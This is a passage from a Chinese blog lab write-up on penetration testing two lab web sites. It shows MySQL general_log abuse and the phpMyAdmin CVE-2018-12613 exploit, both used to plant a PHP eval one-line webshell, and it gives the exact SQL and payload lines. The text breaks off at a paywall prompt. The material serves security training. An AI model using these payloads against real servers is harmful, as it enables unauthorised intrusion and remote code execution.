这篇博客详细介绍了多个网络安全实验,包括Web站点渗透测试、经典加密解密实例(凯撒、Vigenere、SM4、AES、DES、RSA)以及SQL Server的安全设置。实验涵盖了从利用PHPMyAdmin漏洞getshell,到不同加密算法的实现,再到SQL Server安全策略的配置。此外,还提供了网络安全面试题及学习资源,适合网络安全初学者和进阶者学习。
5、因为以root权限登录了phpmyadmin且在步骤3已经通过php探针获取到了网站的绝对路径,所以接下来可以尝试利用日志文件来进行getshell。首先在sql处执行“SHOW VARIABLES LIKE ‘general%’”查看是否开启日志功能以及日志文件的保存路径
6、由上图可知,“set global general_log = “ON”;”开启mysql日志“setglobalgeneral_log_file=‘C://phpStudy//PHPTutorial//WWW//shell.php’;”将日志文件的存储路径改为站点根目录下的shell.php 文件。
7、之后再执行sql语句“select ‘<?php @eval($\_POST[1]);?>’”,向日志文件中写入php一句话木马。
8、之后在浏览器中访问mysql日志文件,shell.php。看到如图所示的界面表示shell写入成功。
9、使用蚁剑对webshell进行连接。(软件无法使用,下图为参照)
实验2 web站点渗透测试2
实验准备
根据平台提供的靶机网址访问网站首页(10.0.26.10),首页界面如下图所示。
实验过程
- 扫描目标站点目录,发现存在“www.zip”文件和phpmyadmin目录
2、下载“www.zip”文件,解压后发现为网址源代码文件。
3、打开config目录下的database.php文件。找到数据库连接的用户名和密码。
4、访问网站的phpmyadmin目录,使用在源代码中找到的数据库用户名和密码进行登录尝试。
5、登录成功后,发现phpmyadmin的版本为4.8.1,这个版本的phpmyadmin存在任意文件包含漏洞(CVE-2018-12613)。参考内容:https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/6、利用CVE-2018-12613进行getshell。在SQL语句执行处执行<?php file\_put\_contents('shell.php','<?php @eval($\_POST[1]);?>');?>,这句话的含义为向shell.php文件中写入一句话木马。
6、通过浏览器开发者工具—application
最低0.47元/天 解锁文章
扫一扫
1565
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
